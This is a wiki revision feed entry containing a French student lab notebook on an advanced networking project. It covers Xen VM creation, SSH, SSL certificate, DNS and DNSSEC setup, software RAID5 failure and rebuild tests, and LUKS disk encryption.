		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46344</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46344"/>
				<updated>2017-11-17T13:39:11Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* DNS SEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
 xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
 ssh username@weppes&lt;br /&gt;
 ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
 search banane.space&lt;br /&gt;
 nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/banane.space.dnssec# ls&lt;br /&gt;
 ????&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o banane.space -k banane.space-ksk &lt;br /&gt;
 ../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine.&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46343</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46343"/>
				<updated>2017-11-17T13:38:20Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
